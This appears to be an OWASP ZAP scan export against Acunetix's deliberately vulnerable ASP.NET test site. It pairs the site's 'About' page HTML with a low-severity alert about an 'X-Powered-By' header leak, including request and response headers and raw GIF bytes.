value="/wEWVwKqq9H0CQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/2grLtTL+jO092JULZB++ks9UGJw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <h1>About this website</h1> <p>The website was built with the intention to test the Acunetix Web Vulnerability Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate the forementioned software's capabilities to find those bugs.</p> <p><b>Please DO NOT use this website as a blog or news site. DO NOT post any sensitive information on this site. This includes e-mail addresses or real names.</b></p> <h1>About Acunetix</h1> <P><B>Combating the web vulnerability threat<BR> </B>Securing a company's web applications is today's most overlooked aspect of securing the enterprise. Web application hacking is on the rise with as many as 75% of cyber attacks done at web application level or via the web. Most corporations have secured their data at the network level, but have overlooked the crucial step of checking whether their web applications are vulnerable to attack. Web applications, which often have a direct line into the company's most valuable data assets, are online 24/7, completely unprotected by a firewall and therefore easy prey for attackers.</P> <P>Acunetix was founded with this threat in mind. We realised the only way to combat web site hacking was to develop an automated tool that could help companies scan their web applications for vulnerabilities. In July 2005, Acunetix Web Vulnerability Scanner was released - a tool that crawls the website for vulnerabilities to SQL injection, cross site scripting and other web attacks before hackers do.</P> <P>The Acunetix development team consists of highly experienced security developers who have each spent years developing network security scanning software prior to starting development on Acunetix WVS. The management team is backed by years of experience marketing and selling security software.</P> <P>Acunetix is a privately held company with its <A href="https://www.acunetix.com/company/contact/"> offices</A> in Malta, US and the UK. </P> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Evidence X-Powered-By: ASP.NETSolution Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.
GET http://testaspnet.vulnweb.com/ads/acunetix.gif
Alert tags Alert description The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.
Request Request line and header section (333 bytes)
GET http://testaspnet.vulnweb.com/ads/acunetix.gif HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com/ads/def.html Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (0 bytes)
Response Status line and header section (247 bytes)
HTTP/1.1 200 OK Content-Type: image/gif Last-Modified: Thu, 29 May 2008 14:36:52 GMT Accept-Ranges: bytes ETag: "eb3686f99c1c81:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:21 GMT Content-Length: 3048Response body (3048 bytes)
GIF89a ÷ å1:555øõõäääÑÑѪªªÚÚÚiiiúÕÖä*3¯®® ÒÒÒ111î|èCJèMT¼¼¼æææáááõ²µä$-êU[þüüAAA^^^æ:Bvvv>>>§§§â!÷ââímrá ÁÁÁùÌκººìz···òTTTò«®íkkk¸¸¸cccmmmï ìdjÃÃÃNNN"""ñ¿Áìqvò¥§zzzttt888ñØØØÕÕÕrssfffËËËýóóùññ÷æç÷ÝÝZZZ}}}FFFDDDó»½HHHçFM---¾¿¿æBISSS%%%```&&&XXXâøÇÉxxx JJJé_e***:::©¨¨ï âêioã$â!áæ/8ä(âùùù÷÷÷øøøÿþþÿÿþÿþÿþÿÿþþÿþÿþðððeeeõõõúûúíííóóó´´´°°°ùùúûúúúúûìììñññ÷÷øôôôûûúýýý÷ø÷ïïïµµµòòòëëëêêêøø÷¤¤¤èèèÌÌÌÍÍÍßßßÈÈȳ³³ø÷ø¡¡¡ÇÇÇîîî²²²~~~ QQQùúú¥¥¥ùúù×××ÜÜÜÏÏÏ÷øøãããÝÝÝÆÆÆLLLöÑÓppp𢢢ûûüûøødddâââúÜÝíç@GÉÉÉÞÞÞþúúoooñðñòúûûOOOÝÜÝðûÝßôôõõõôúÙÚððñôÉËèHNâãâó¡îw|ë`fïîqxíäRQQôÆÈûßàííîóÝÞöÚÚúÏÑð°ã&ñ´¶á{{{ÅÅÅøÞßöÁÂúúùûÞßîûàâúêëùÓÔýïïöööûûûúúúþþþüüüá ÿÿÿ!ù , ÿ ÷ H° Á*\Ȱ¡Ã oÁ²` `rP/O=~öé§?zòDÊÉã¾>}Æ|Ó£>|þå8'L0ùÀyr'A=æÙóï_Hì¹ç?=2O\ºàÓ¡Mkº¬Jðþ¤i?Jû>õsO×{|5µûÏI=ÿ~ÁãeC,´s/ߦæÁ9r¤ã=V¹b&iÕ©È8û(|õsSÀ!k;§ë=û ügçß=}¬ÚÕc©²hìÞľ§÷IæÚ'¬ÞÈ£AÓ¯ºuën0X@½»÷ïàÃÿO¾|xFÀÓFÔ cæÿñëîäëøñC(c>ßA(WÞ>Lòñ%Ç)äSÿázÁu'`|F&ùuxEGÀÁÀÍhò-À ÝÐg0TId r xtgG òAS¨p £üSÁ.jØè §gGSh;l°Â|ýÑ Q ¥Å2¬ðO3ìrÀ ÿ°"Ãü &d½ 2ÃDj7y|HeºåÖ¬¸UHdùÀ¢æ d !ݲZ4ÏhU±ÂY: cwM¬A©[V4ÿ Ù ¾JÉ?¸uÈ?àV%Íî@ö' J B¯ºe¾úóhS¢;ÐT¦þlÚé§þ*©á±·@ÇIhEQ-ZÒÑÞj®M©â@6[G6uÈ&lé´XÐð*9ÌÖµÿl è8¼¢ðª1È?à§ 6źhEBx0ïŨ S"xá¡ü CTñϾhíÚÔnuÐT%nÁðÏÿ¤ ðÖt¿ñê !ðZÛ&ÒuSáOY2§'kîÊn!Jd¯$ÿÊÀ¥ÿ<â[@·Hnafz4¥Óþ8ý-ä2ðÉ> åÀÈóPÂrÈ¡ðÙ9ZbwWÀ¼FâáÞó ·ßjJwd(«2ËöB'[l4Õ[SxGyË%4E¡zA.ù?©TÛLôÂ)ß?Ü PÄJ:MR-à |ñzpgxsò¹hqIw1¸õCS¸ #A ¨)qqt: -´¨2ü<D Ð:yXÆ}<Ô¦XÂ-¨ 'õ¢Åå_Ýæ7¬amñDµPÑ8ÌawÀ 5_YÿÕ Èð#¼þaÌm¨Ùá!pgnÙÛwJPG©À-J# qg·Ý¡EÌ'fø?¤g[¯ÒB׸6 Òòmà!8Pã#Àìñ6x øÜò ðPm}`óGÉÃMÝo º£?ÐØ5ðfiÙÀ@ÊRg¨ÂþAÇ12tKÈ¡½/èða8xÈø( [bÓípËð! âóÏ<
-
-
ZAP